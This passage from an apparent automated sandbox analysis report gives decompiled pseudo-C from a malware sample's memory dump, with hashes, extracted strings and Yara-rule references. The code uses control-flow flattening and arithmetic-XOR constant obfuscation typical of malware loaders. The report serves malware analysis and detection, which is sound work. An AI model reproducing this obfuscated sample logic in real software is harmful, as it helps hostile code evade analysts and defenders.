								 *((char*)(_t344 + 0x1f)) =  *((intOrPtr*)(_t330 + 1));
								 *(_t344 + 0x1e) =  *((intOrPtr*)(_t330 + 3));
								_t268 = E02B4E1F8(0x2b31758,  *(_t344 + 0x30), __eflags);
								_push( *(_t330 + 2) & 0x000000ff);
								E02B3F96F( *(_t344 + 0x74), __eflags, 0x10,  *(_t344 + 0x3f) & 0x000000ff, _t268,  *(_t344 + 0x1e) & 0x000000ff,  *((intOrPtr*)(_t344 + 0x84)), _t342 + 0x20,  *(_t330 + 2) & 0x000000ff,  *(_t344 + 0x60),  *((intOrPtr*)(_t344 + 0x58)),  *(_t344 + 0x50));
								_t223 = _t344 + 0x5c; // 0xa2772
								E02B4FECB(_t268,  *((intOrPtr*)(_t344 + 0x90)),  *((intOrPtr*)(_t344 + 0xa0)),  *(_t344 + 0x64),  *_t223);
								_t344 = _t344 + 0x40;
								 *(_t342 + 0x14) = ( *(_t330 + 4) & 0x000000ff) << 0x00000008 |  *(_t330 + 5) & 0x000000ff;
								_t274 =  *((intOrPtr*)(_t330 + 6));
								_t296 =  *((intOrPtr*)(_t330 + 7));
								_t330 = _t330 + 8;
								_t288 = 0x42bf5b6;
								 *(_t342 + 0x44) = (_t274 & 0x000000ff) << 0x00000008 | _t296 & 0x000000ff;
								goto L1;
							} else {
								if(_t288 == 0x4bd14f4) {
									_t326 =  *0x2b56228; // 0x0
									_t288 = 0x70ba79f;
									_t316 = _t326 + 0x14;
									 *(_t344 + 0x68) = _t316;
									goto L2;
								} else {
									if(_t288 == 0x70ba79f) {
										_t277 = E02B43D85( *(_t344 + 0x60), 0x2b56000, __eflags, _t344 + 0x78,  *(_t344 + 0x18));
										_t316 =  *(_t344 + 0x70);
										_t330 = _t277;
										 *((intOrPtr*)(_t344 + 0x7c)) = _t277;
										_t261 = _t277 +  *((intOrPtr*)(_t344 + 0x78));
										 *((intOrPtr*)(_t344 + 0x6c)) = _t261;
										_t288 = 0xc4a3c33;
										continue;
									} else {
										if(_t288 == 0x9fd5b32) {
											__eflags = _t330 - _t261;
											asm("sbb ecx, ecx");
											_t288 = (_t288 & 0x0165beb9) + 0xae47d7a;
											continue;
										} else {
											if(_t288 == 0xae47d7a) {
												E02B52B09( *((intOrPtr*)(_t344 + 0x78)),  *((intOrPtr*)(_t344 + 0x7c)),  *((intOrPtr*)(_t344 + 0x34)),  *(_t344 + 0x54));
											} else {
												if(_t288 != 0xc4a3c33) {
													L17:
													__eflags = _t288 - 0xd28cf5a;
													if(__eflags != 0) {
														L2:
														_t261 =  *((intOrPtr*)(_t344 + 0x6c));
														continue;
													}
												} else {
													_push(_t288);
													_push(_t288);
													_t342 = E02B3C5D8(0x60);
													_t344 = _t344 + 0xc;
													if(_t342 != 0) {
														_t288 = 0x434f657;
														while(1) {
															L1:
															_t316 =  *(_t344 + 0x68);
															while(1) {
																L2:
																_t261 =  *((intOrPtr*)(_t344 + 0x6c));
																goto L3;
															}
														}
													}
												}
											}
										}
									}
								}
							}
							_t289 =  *0x2b56228; // 0x0
							 *(_t289 + 0x1c) =  *(_t289 + 0x1c) & 0x00000000;
							 *((intOrPtr*)(_t289 + 4)) =  *((intOrPtr*)(_t289 + 0x14));
							__eflags = 1;
							return 1;
						}
						_t262 =  *0x2b56228; // 0x0
						_t288 = 0x9fd5b32;
						 *_t316 = _t342;
						_t316 = _t342 + 0x18;
						 *(_t344 + 0x68) = _t316;
						_t235 = _t262 + 0x18;
						 *_t235 =  *((intOrPtr*)(_t262 + 0x18)) + 1;
						__eflags =  *_t235;
						goto L17;
					}
				}
			}

0x02b53eec
0x02b53ef3
0x02b53ef8
0x02b53efd
0x02b53f05
0x02b53f0d
0x02b53f15
0x02b53f1d
0x02b53f2e
0x02b53f38
0x02b53f3d
0x02b53f43
0x02b53f48
0x02b53f50
0x02b53f58
0x02b53f60
0x02b53f65
0x02b53f6d
0x02b53f75
0x02b53f7e
0x02b53f83
0x02b53f89
0x02b53f91
0x02b53f99
0x02b53fa1
0x02b53fa6
0x02b53fae
0x02b53fba
0x02b53fbf
0x02b53fc5
0x02b53fca
0x02b53fd2
0x02b53fda
0x02b53fe6
0x02b53feb
0x02b53ff5
0x02b53ff8
0x02b53ffc
0x02b54004
0x02b5400c
0x02b54014
0x02b5401c
0x02b54024
0x02b5402c
0x02b54034
0x02b5403c
0x02b54041
0x02b54049
0x02b54051
0x02b54059
0x02b54061
0x02b54069
0x02b54071
0x02b54079
0x02b54086
0x02b5408a
0x02b54094
0x02b540a3
0x02b540a4
0x02b540a8
0x02b540ac
0x02b540b0
0x02b540b8
0x02b540c0
0x02b540c5
0x02b540ca
0x02b540d2
0x02b540da
0x02b540e2
0x02b540ea
0x02b540f2
0x02b54100
0x02b54104
0x02b5410c
0x02b54114
0x02b5411c
0x02b54124
0x02b54129
0x02b54131
0x02b54139
0x02b54141
0x02b54149
0x02b54151
0x02b54159
0x02b5415e
0x02b54166
0x02b5416e
0x02b54176
0x02b5417b
0x02b54188
0x02b5418c
0x02b54194
0x02b5419c
0x02b541a4
0x02b541ac
0x02b541b4
0x02b541b9
0x02b541c1
0x02b541c9
0x02b541d1
0x02b541d9
0x02b541e1
0x02b541e6
0x02b541ee
0x02b541ee
0x02b541ee
0x02b541f2
0x02b541f2
0x02b541f2
0x00000000
0x02b541f6
0x02b54208
0x02b542d3
0x02b542df
0x02b542e5
0x02b542f0
0x02b542f7
0x02b542fb
0x02b5430a
0x02b54335
0x02b5433a
0x02b54352
0x02b5435b
0x02b54369
0x02b5436d
0x02b54370
0x02b54373
0x02b5437c
0x02b54388
0x00000000
0x02b5420e
0x02b54214
0x02b542bc
0x02b542c2
0x02b542c7
0x02b542ca
0x00000000
0x02b5421a
0x02b54220
0x02b54299
0x02b5429e
0x02b542a2
0x02b542a5
0x02b542a9
0x02b542ae
0x02b542b2
0x00000000
0x02b54222
0x02b54228
0x02b54272
0x02b54274
0x02b5427c
0x00000000
0x02b5422a
0x02b54230
0x02b543c4
0x02b54236
0x02b5423c
0x02b543a7
0x02b543a7
0x02b543ad
0x02b541f2
0x02b541f2
0x00000000
0x02b541f2
0x02b54242
0x02b54252
0x02b54253
0x02b5425b
0x02b5425d
0x02b54262
0x02b54268
0x02b541ee
0x02b541ee
0x02b541ee
0x02b541f2
0x02b541f2
0x02b541f2
0x00000000
0x02b541f2
0x02b541f2
0x02b541ee
0x02b54262
0x02b5423c
0x02b54230
0x02b54228
0x02b54220
0x02b54214
0x02b543cb
0x02b543d7
0x02b543db
0x02b543e0
0x02b543e5
0x02b543e5
0x02b54391
0x02b54396
0x02b5439b
0x02b5439d
0x02b543a0
0x02b543a4
0x02b543a4
0x02b543a4
0x00000000
0x02b543a4
0x02b541f2

Strings

z}, xrefs: 02B5422A
y%, xrefs: 02B54129
q(, xrefs: 02B540E2
r', xrefs: 02B5433A
ldM', xrefs: 02B541E6

Memory Dump Source

Source File: 00000001.00000002.321766377.0000000002B31000.00000020.00000001.sdmp, Offset: 02B30000, based on PE: true

Associated: 00000001.00000002.321760643.0000000002B30000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.321787146.0000000002B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2b30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: ldM'$q($r'$y%$z}
API String ID: 0-1771948706
Opcode ID: 14b3834e59ddbf112d41477315d733e33b8c1a2681f87fc7035139d85a7a2544
Instruction ID: 1e6011b2a298e1be9ce455338182d8dcdb03f0aca3125360c018ab743fad2f8e
Opcode Fuzzy Hash: 14b3834e59ddbf112d41477315d733e33b8c1a2681f87fc7035139d85a7a2544
Instruction Fuzzy Hash: 3CD132711083819FD368CF25C48965BBFF2FB95358F148A0DF6A69A260D3B5C949CF82

Uniqueness

Uniqueness Score: -1.00%

Function 02B3FB8E, Relevance: 6.5, Strings: 5, Instructions: 266
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E02B3FB8E(void* __ecx, intOrPtr* __edx, intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				void* _t261;
				intOrPtr* _t284;
				void* _t286;
				intOrPtr _t294;
				intOrPtr* _t295;
				void* _t297;
				intOrPtr* _t299;
				void* _t301;
				void* _t325;
				intOrPtr* _t327;
				signed int _t328;
				signed int _t329;
				signed int _t330;
				signed int _t331;
				signed int _t332;
				signed int _t333;
				signed int _t334;
				signed int* _t337;

				_t299 = _a4;
				_push(_a8);
				_t327 = __edx;
				_push(_t299);
				_push(__edx);
				_push(__ecx);
				E02B4FE29(_t261);
				_v92 = 0x4ad2af;
				_t337 =  &(( &_v124)[4]);
				_v92 = _v92 << 4;
				_t325 = 0;
				_t301 = 0xeae8bd1;
				_t328 = 0x27;
				_v92 = _v92 * 0x30;
				_v92 = _v92 ^ 0xe0780d01;
				_v32 = 0x52ecdf;
				_v32 = _v32 | 0x4795fc12;
				_v32 = _v32 ^ 0x47d7fcde;
				_v40 = 0x6c24d1;
				_v40 = _v40 + 0xffffd677;
				_v40 = _v40 ^ 0x006bfb48;
				_v124 = 0xafb159;
				_v124 = _v124 + 0x853c;
				_v124 = _v124 * 0x3c;
				_v124 = _v124 + 0xffffb483;
				_v124 = _v124 ^ 0x294c7f6f;
				_v116 = 0x2e5989;
				_v116 = _v116 << 3;
				_v116 = _v116 << 0xc;
				_v116 = _v116 + 0xffff32fd;
				_v116 = _v116 ^ 0x2cc3b2fd;
				_v104 = 0xb70fe2;
				_v104 = _v104 * 0x61;
				_v104 = _v104 >> 0xd;
				_v104 = _v104 >> 9;
				_v104 = _v104 ^ 0x00000115;
				_v20 = 0x29c7ba;
				_v20 = _v20 / _t328;
				_v20 = _v20 ^ 0x0001123f;
				_v44 = 0xd235de;
				_t329 = 0x19;
				_v44 = _v44 * 0x34;
				_v44 = _v44 ^ 0x2ab83bf3;
				_v120 = 0x2b8a20;
				_v120 = _v120 / _t329;
				_v120 = _v120 + 0xd97b;
				_v120 = _v120 + 0x9745;
				_v120 = _v120 ^ 0x00091694;
				_v80 = 0x44ed89;
				_v80 = _v80 << 8;
				_v80 = _v80 + 0x6d47;
				_v80 = _v80 ^ 0x44e06617;
				_v84 = 0x8c3da4;
				_v84 = _v84 << 3;
				_v84 = _v84 + 0xffff28ee;
				_v84 = _v84 ^ 0x04621daf;
				_v88 = 0x7b0e01;
				_t330 = 0x2a;
				_v88 = _v88 * 0x7e;
				_v88 = _v88 / _t330;
				_v88 = _v88 ^ 0x01771ea0;
				_v48 = 0xf210e7;
				_t331 = 0x56;
				_v48 = _v48 / _t331;
				_v48 = _v48 ^ 0x000151ed;
				_v52 = 0xb85aaa;
				_v52 = _v52 ^ 0x7279f80c;
				_v52 = _v52 ^ 0x72c0fdc9;
				_v108 = 0xe210ad;
				_v108 = _v108 + 0xffffc30f;
				_v108 = _v108 ^ 0xff005d9c;
				_v108 = _v108 ^ 0x468aee4e;
				_v108 = _v108 ^ 0xb96c249f;
				_v36 = 0xf02045;
				_t332 = 0x7e;
				_v36 = _v36 * 0x7d;
				_v36 = _v36 ^ 0x753d6877;
				_v76 = 0x890c0b;
				_v76 = _v76 | 0x3fa19484;
				_v76 = _v76 + 0xc76f;
				_v76 = _v76 ^ 0x3fa932ba;
				_v112 = 0xdcee96;
				_v112 = _v112 << 0xb;
				_v112 = _v112 / _t332;
				_v112 = _v112 ^ 0x6c4d9ccb;
				_v112 = _v112 ^ 0x6d94fd95;
				_v56 = 0x741505;
				_t333 = 0x1d;
				_v56 = _v56 / _t333;
				_v56 = _v56 + 0xe34c;
				_v56 = _v56 ^ 0x00059e64;
				_v24 = 0xde7835;
				_t334 = 0x73;
				_v24 = _v24 * 7;
				_v24 = _v24 ^ 0x0614b333;
				_v28 = 0x817a7e;
				_v28 = _v28 + 0x50ff;
				_v28 = _v28 ^ 0x008db9da;
				_v60 = 0x30460f;
				_v60 = _v60 | 0x5b476089;
				_v60 = _v60 + 0x7857;
				_v60 = _v60 ^ 0x5b7b85ad;
				_v64 = 0x3287c5;
				_v64 = _v64 >> 0x10;
				_v64 = _v64 | 0xf6bf374a;
				_v64 = _v64 ^ 0xf6be02d9;
				_v68 = 0xbf5def;
				_v68 = _v68 + 0xffff47b3;
				_v68 = _v68 + 0xffff0d11;
				_v68 = _v68 ^ 0x00bf58a8;
				_v72 = 0xc5c956;
				_v72 = _v72 ^ 0x0920ed5d;
				_v72 = _v72 / _t334;
				_v72 = _v72 ^ 0x00102287;
				_v16 = 0x6e7810;
				_v16 = _v16 + 0xffff2e79;
				_v16 = _v16 ^ 0x0061adb7;
				_v96 = 0xe3f1bb;
				_v96 = _v96 | 0x17c89f2a;
				_v96 = _v96 ^ 0x2d56d01e;
				_v96 = _v96 ^ 0x01e2669f;
				_v96 = _v96 ^ 0x3b5230bc;
				_v100 = 0x967d31;
				_v100 = _v100 | 0xebdf376e;
				_v100 = _v100 + 0x87ad;
				_v100 = _v100 ^ 0xebeed43d;
				do {
					while(_t301 != 0x242fff5) {
						if(_t301 == 0x95dc10a) {
							_push(_t301);
							_push(_t301);
							_t294 = E02B3C5D8(_v8);
							_t337 =  &(_t337[3]);
							_v12 = _t294;
							if(_t294 != 0) {
								_t301 = 0x242fff5;
								continue;
							}
						} else {
							if(_t301 == 0xb01d963) {
								_t295 =  *0x2b56224; // 0x0
								_t297 = E02B32194(_v40, _v44, _t301, _v120, _v80, _v124, _v84, _v88, _t301, _v48,  *_t327, _v52,  &_v8,  *((intOrPtr*)(_t327 + 4)), _v92,  *_t295, _t325);
								_t337 =  &(_t337[0xf]);
								if(_t297 == _v116) {
									_t301 = 0x95dc10a;
									continue;
								}
							} else {
								if(_t301 == 0xb93db5b) {
									E02B52B09(_v16, _v12, _v96, _v100);
								} else {
									if(_t301 != 0xeae8bd1) {
										goto L13;
									} else {
										_t301 = 0xb01d963;
										continue;
									}
								}
							}
						}
						L17:
						return _t325;
					}
					_t284 =  *0x2b56224; // 0x0
					_t286 = E02B32194(_v8, _v56, _t301, _v24, _v28, _v104, _v60, _v64, _t301, _v68,  *_t327, _v72,  &_v8,  *((intOrPtr*)(_t327 + 4)), _v32,  *_t284, _v12);
					_t337 =  &(_t337[0xf]);
					if(_t286 == _v20) {
						 *_t299 = _v12;
						_t325 = 1;
						 *((intOrPtr*)(_t299 + 4)) = _v8;
					} else {
						_t301 = 0xb93db5b;
						goto L13;
					}
					goto L17;
					L13:
				} while (_t301 != 0xf5a5c60);
				goto L17;
			}

0x02b3fb92
0x02b3fb9c
0x02b3fba3
0x02b3fba5
0x02b3fba6
0x02b3fba7
0x02b3fba8
0x02b3fbad
0x02b3fbb5
0x02b3fbb8
0x02b3fbc4
0x02b3fbc6
0x02b3fbcd
0x02b3fbd0
0x02b3fbd4
0x02b3fbdc
0x02b3fbe4
0x02b3fbec
0x02b3fbf4
0x02b3fbfc
0x02b3fc04
0x02b3fc0c
0x02b3fc14
0x02b3fc21
0x02b3fc25
0x02b3fc2d
0x02b3fc35
0x02b3fc3d
0x02b3fc42
0x02b3fc47
0x02b3fc4f
0x02b3fc57
0x02b3fc64
0x02b3fc68
0x02b3fc6d
0x02b3fc72
0x02b3fc7a
0x02b3fc8a
0x02b3fc8e
0x02b3fc96
0x02b3fca3
0x02b3fca6
0x02b3fcaa
0x02b3fcb2
0x02b3fcc2
0x02b3fcc6
0x02b3fcce
0x02b3fcd6
0x02b3fcde
0x02b3fce6
0x02b3fceb
0x02b3fcf3
0x02b3fcfb
0x02b3fd03
0x02b3fd08
0x02b3fd10
0x02b3fd18
0x02b3fd25
0x02b3fd26
0x02b3fd30
0x02b3fd34
0x02b3fd3e
0x02b3fd4c
0x02b3fd51
0x02b3fd57
0x02b3fd5f
0x02b3fd67
0x02b3fd6f
0x02b3fd77
0x02b3fd7f
0x02b3fd87
0x02b3fd8f
0x02b3fd97
0x02b3fd9f
0x02b3fdac
0x02b3fdaf
0x02b3fdb3
0x02b3fdbb
0x02b3fdc3
0x02b3fdcb
0x02b3fdd3
0x02b3fddb
0x02b3fde3
0x02b3fdf0
0x02b3fdf4
0x02b3fdfc
0x02b3fe04
0x02b3fe10
0x02b3fe15
0x02b3fe1b
0x02b3fe23
0x02b3fe2b
0x02b3fe38
0x02b3fe39
0x02b3fe3d
0x02b3fe45
0x02b3fe4d
0x02b3fe55
0x02b3fe5d
0x02b3fe65
0x02b3fe6d
0x02b3fe75
0x02b3fe7d
0x02b3fe85
0x02b3fe8a
0x02b3fe92
0x02b3fe9a
0x02b3fea2
0x02b3feaa
0x02b3feb2
0x02b3feba
0x02b3fec2
0x02b3fed0
0x02b3fed4
0x02b3fedc
0x02b3fee4
0x02b3feec
0x02b3fef4
0x02b3fefc
0x02b3ff04
0x02b3ff0c
0x02b3ff14
0x02b3ff1c
0x02b3ff24
0x02b3ff31
0x02b3ff39
0x02b3ff41
0x02b3ff41
0x02b3ff4f
0x02b3ffed
0x02b3ffee
0x02b3fff6
0x02b3fffb
0x02b3fffe
0x02b40007
0x02b4000d
0x00000000
0x02b4000d
0x02b3ff55
0x02b3ff5b
0x02b3ff7c
0x02b3ffc1
0x02b3ffc6
0x02b3ffcd
0x02b3ffd3
0x00000000
0x02b3ffd3
0x02b3ff5d
0x02b3ff63
0x02b4009c
0x02b3ff69
0x02b3ff6f
0x00000000
0x02b3ff75
0x02b3ff75
0x00000000
0x02b3ff75
0x02b3ff6f
0x02b3ff63
0x02b3ff5b
0x02b400bb
0x02b400c4
0x02b400c4
0x02b4001b
0x02b40065
0x02b4006a
0x02b40071
0x02b400ae
0x02b400b0
0x02b400b8
0x02b40073
0x02b40073
0x00000000
0x02b40073
0x00000000
0x02b40078
0x02b40078
0x00000000

Strings

wh=u, xrefs: 02B3FDB3
Gm, xrefs: 02B3FCEB
Wx, xrefs: 02B3FE6D
L, xrefs: 02B3FE1B
] , xrefs: 02B3FEC2

Memory Dump Source

Source File: 00000001.00000002.321766377.0000000002B31000.00000020.00000001.sdmp, Offset: 02B30000, based on PE: true

Associated: 00000001.00000002.321760643.0000000002B30000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.321787146.0000000002B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2b30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: Gm$L$Wx$] $wh=u
API String ID: 0-1494249286
Opcode ID: a5ebb1f2eb23762663bd38a0f5a8c488e1191f1f47eec641a0080e58477b029d
Instruction ID: 4d1af6ddca61cc08e8fd476f1f9ad5cc08ac10f6d72a6b28e90fb987c9a4243a
Opcode Fuzzy Hash: a5ebb1f2eb23762663bd38a0f5a8c488e1191f1f47eec641a0080e58477b029d
Instruction Fuzzy Hash: FED11F724093809FD768CF66C889A1BFBF2FB85748F10891DF69586260D7B29949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 02B48D3D, Relevance: 6.4, Strings: 5, Instructions: 143
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E02B48D3D() {
				signed int _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _t139;
				intOrPtr _t141;
				intOrPtr _t147;
				signed int _t151;
				signed int _t152;
				signed int _t153;
				signed int _t154;
				intOrPtr* _t155;
				signed int _t170;
				void* _t172;
				signed int* _t174;

				_t174 =  &_v60;
				_v4 = _v4 & 0x00000000;
				_v16 = 0xb96ea3;
				_v12 = 0x2b597c;
				_v8 = 0x15d14c;
				_v24 = 0xfb9f01;
				_v24 = _v24 + 0xffffc2ea;
				_v24 = _v24 ^ 0x00f09b24;
				_v28 = 0x44d8ac;
				_v28 = _v28 << 2;
				_v28 = _v28 ^ 0x0118b46b;
				_v56 = 0xb4bcfb;
				_v56 = _v56 >> 0x10;
				_v56 = _v56 + 0x1918;
				_t151 = 0x33;
				_v56 = _v56 / _t151;
				_t172 = 0x18a299a;
				_v56 = _v56 ^ 0x00075f97;
				_v60 = 0x54631c;
				_t152 = 0x32;
				_v60 = _v60 / _t152;
				_v60 = _v60 + 0xe0cb;
				_v60 = _v60 + 0x7b8a;
				_v60 = _v60 ^ 0x000a1fda;
				_v32 = 0x2b0ed;
				_v32 = _v32 >> 0xb;
				_v32 = _v32 | 0x09ea9e28;
				_v32 = _v32 ^ 0x09ed7baa;
				_v48 = 0x16a7f0;
				_v48 = _v48 << 6;
				_t170 = 0x54;
				_v48 = _v48 / _t170;
				_t153 = 0x50;
				_v48 = _v48 / _t153;
				_v48 = _v48 ^ 0x000d9328;
				_v52 = 0x3f1fdb;
				_v52 = _v52 | 0x0053e637;
				_v52 = _v52 ^ 0xce168c33;
				_v52 = _v52 >> 4;
				_v52 = _v52 ^ 0x0ce6f5f4;
				_v36 = 0x33e495;
				_v36 = _v36 + 0xc7cc;
				_v36 = _v36 / _t170;
				_v36 = _v36 + 0x230d;
				_v36 = _v36 ^ 0x000308d4;
				_v40 = 0xaa804b;
				_t139 = _v40;
				_t154 = 0x42;
				_t169 = _t139 % _t154;
				_v40 = _t139 / _t154;
				_v40 = _v40 + 0xffff246c;
				_v40 = _v40 >> 7;
				_v40 = _v40 ^ 0x000d5f20;
				_v44 = 0x5ad1c5;
				_v44 = _v44 + 0x4d5e;
				_v44 = _v44 + 0xffff9f53;
				_v44 = _v44 + 0xffff11b0;
				_v44 = _v44 ^ 0x005bbdbb;
				_v20 = 0x89125f;
				_v20 = _v20 ^ 0x0bb83411;
				_v20 = _v20 ^ 0x0b3ba340;
				_t155 =  *0x2b56208; // 0x0
				do {
					while(_t172 != 0x550abf) {
						if(_t172 == 0x18a299a) {
							_push(_t155);
							_push(_t155);
							_t155 = E02B3C5D8(0x2c);
							_t174 =  &(_t174[3]);
							 *0x2b56208 = _t155;
							_t172 = 0x550abf;
							continue;
						} else {
							if(_t172 != 0x6125a42) {
								goto L8;
							} else {
								_t147 = E02B40EBC(_v36, _t169, _v40, _t155, _v44, _v20, _t155, _t155, 0, E02B536AA);
								_t155 =  *0x2b56208; // 0x0
								 *_t155 = _t147;
							}
						}
						L5:
						return 0 | _t155 != 0x00000000;
					}
					_t169 = _v48;
					_t141 = E02B348DD(_v32, _v48, _v52);
					_t155 =  *0x2b56208; // 0x0
					_t174 = _t174 - 0x10 + 0x14;
					_t172 = 0x6125a42;
					 *((intOrPtr*)(_t155 + 0x18)) = _t141;
					L8:
				} while (_t172 != 0x92686f5);
				goto L5;
			}

0x02b48d3d
0x02b48d40
0x02b48d47
0x02b48d4f
0x02b48d57
0x02b48d5f
0x02b48d67
0x02b48d6f
0x02b48d77
0x02b48d7f
0x02b48d84
0x02b48d8c
0x02b48d94
0x02b48d99
0x02b48dab
0x02b48db5
0x02b48db9
0x02b48dbb
0x02b48dc3
0x02b48dd1
0x02b48dd6
0x02b48dda
0x02b48de2
0x02b48dea
0x02b48df2
0x02b48dfa
0x02b48dff
0x02b48e07
0x02b48e0f
0x02b48e17
0x02b48e22
0x02b48e27
0x02b48e31
0x02b48e36
0x02b48e3a
0x02b48e42
0x02b48e4a
0x02b48e52
0x02b48e5a
0x02b48e5f
0x02b48e67
0x02b48e6f
0x02b48e7f
0x02b48e85
0x02b48e8d
0x02b48e95
0x02b48e9d
0x02b48ea1
0x02b48ea2
0x02b48ea4
0x02b48ea8
0x02b48eb0
0x02b48eb5
0x02b48ebd
0x02b48ec5
0x02b48ecd
0x02b48ed5
0x02b48ee2
0x02b48eef
0x02b48ef7
0x02b48eff
0x02b48f07
0x02b48f0d
0x02b48f0d
0x02b48f13
0x02b48f66
0x02b48f67
0x02b48f6f
0x02b48f71
0x02b48f74
0x02b48f7a
0x00000000
0x02b48f15
0x02b48f17
0x00000000
0x02b48f1d
0x02b48f37
0x02b48f3c
0x02b48f45
0x02b48f45
0x02b48f17
0x02b48f48
0x02b48f55
0x02b48f55
0x02b48f85
0x02b48f8d
0x02b48f92
0x02b48f98
0x02b48f9b
0x02b48f9d
0x02b48fa0
0x02b48fa0
0x00000000

Strings

7S, xrefs: 02B48E4A
|Y+, xrefs: 02B48D4F
_, xrefs: 02B48EB5
^M, xrefs: 02B48EC5
#, xrefs: 02B48E85

Memory Dump Source

Source File: 00000001.00000002.321766377.0000000002B31000.00000020.00000001.sdmp, Offset: 02B30000, based on PE: true

Associated: 00000001.00000002.321760643.0000000002B30000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.321787146.0000000002B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2b30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: #$ _$7S$^M$|Y+
API String ID: 0-3744723356
Opcode ID: 425157e4d92f352f66f4539baea87c701b30779c13f39200cde229a2125fca79
Instruction ID: c6026b189e11c0cd1633e8c1a48f4d7adf7569b47e89bbab3d4c5470726bc63b
Opcode Fuzzy Hash: 425157e4d92f352f66f4539baea87c701b30779c13f39200cde229a2125fca79
Instruction Fuzzy Hash: 2F5146719083419FD348DF25D88950BBBE1FBC8768F008E1DF5D9A6260D7B58A49CF4A

Uniqueness

Uniqueness Score: -1.00%

Function 02B500EF, Relevance: 5.3, Strings: 4, Instructions: 274
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E02B500EF(void* __ecx) {
				char _v520;
				char _v1040;
				char _v1560;
				void* _v1572;
				intOrPtr _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				unsigned int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _t303;
				void* _t316;
				signed int _t318;
				signed int _t319;
				signed int _t320;
				signed int _t321;
				signed int _t322;
				signed int _t323;
				signed int _t324;
				signed int _t325;
				signed int _t326;
				signed int _t327;
				signed int _t328;
				void* _t370;
				signed int* _t373;

				_t373 =  &_v1692;
				_v1576 = 0xe8da59;
				asm("stosd");
				_t316 = __ecx;
				_t318 = 0x5a;
				asm("stosd");
				_t370 = 0x219adc7;
				asm("stosd");
				_v1592 = 0x4cba20;
				_v1592 = _v1592 / _t318;
				_v1592 = _v1592 ^ 0x000e53d2;
				_v1660 = 0x37da44;
				_v1660 = _v1660 | 0x897b84ec;
				_v1660 = _v1660 >> 7;
				_v1660 = _v1660 ^ 0x011e0d16;
				_v1628 = 0x1c89a1;
				_v1628 = _v1628 | 0x8af6c41c;
				_v1628 = _v1628 ^ 0x8af282b8;
				_v1684 = 0xdb2dca;
				_v1684 = _v1684 | 0x5a04171c;
				_t319 = 0xb;
				_v1684 = _v1684 * 0x1a;
				_v1684 = _v1684 >> 0xb;
				_v1684 = _v1684 ^ 0x000c87cc;
				_v1676 = 0x832ed6;
				_v1676 = _v1676 / _t319;
				_t320 = 5;
				_v1676 = _v1676 / _t320;
				_v1676 = _v1676 ^ 0xed35e4ac;
				_v1676 = _v1676 ^ 0xed379c5b;
				_v1616 = 0xcbfb93;
				_v1616 = _v1616 >> 7;
				_v1616 = _v1616 ^ 0x000d5997;
				_v1688 = 0xe655f9;
				_v1688 = _v1688 + 0xffff9882;
				_t321 = 0x2b;
				_v1688 = _v1688 * 0xb;
				_v1688 = _v1688 * 0x5b;
				_v1688 = _v1688 ^ 0x83159ef1;
				_v1692 = 0xaa6b82;
				_v1692 = _v1692 | 0xcfd3fae0;
				_v1692 = _v1692 / _t321;
				_v1692 = _v1692 * 0x7a;
				_v1692 = _v1692 ^ 0x4e1b8b3c;
				_v1644 = 0x70af24;
				_v1644 = _v1644 << 5;
				_v1644 = _v1644 | 0xf364d4b3;
				_v1644 = _v1644 ^ 0xff7a96be;
				_v1668 = 0x4a582b;
				_v1668 = _v1668 * 0x66;
				_v1668 = _v1668 << 0xf;
				_v1668 = _v1668 ^ 0x909bc222;
				_v1636 = 0x31215f;
				_v1636 = _v1636 ^ 0x6923b039;
				_t322 = 0x29;
				_v1636 = _v1636 / _t322;
				_v1636 = _v1636 ^ 0x029cf3aa;
				_v1652 = 0x9b2524;
				_t323 = 0x38;
				_v1652 = _v1652 / _t323;
				_v1652 = _v1652 ^ 0x48c3dfd8;
				_v1652 = _v1652 ^ 0x48c1ce16;
				_v1608 = 0x82759;
				_v1608 = _v1608 >> 9;
				_v1608 = _v1608 ^ 0x000ff1e7;
				_v1580 = 0x9cb9ac;
				_v1580 = _v1580 + 0xffffe541;
				_v1580 = _v1580 ^ 0x0099fe2e;
				_v1648 = 0xf0b12f;
				_v1648 = _v1648 >> 3;
				_v1648 = _v1648 >> 0xc;
				_v1648 = _v1648 ^ 0x000b1180;
				_v1680 = 0x5a67b4;
				_t324 = 0x1f;
				_v1680 = _v1680 / _t324;
				_t325 = 0x30;
				_v1680 = _v1680 * 0x62;
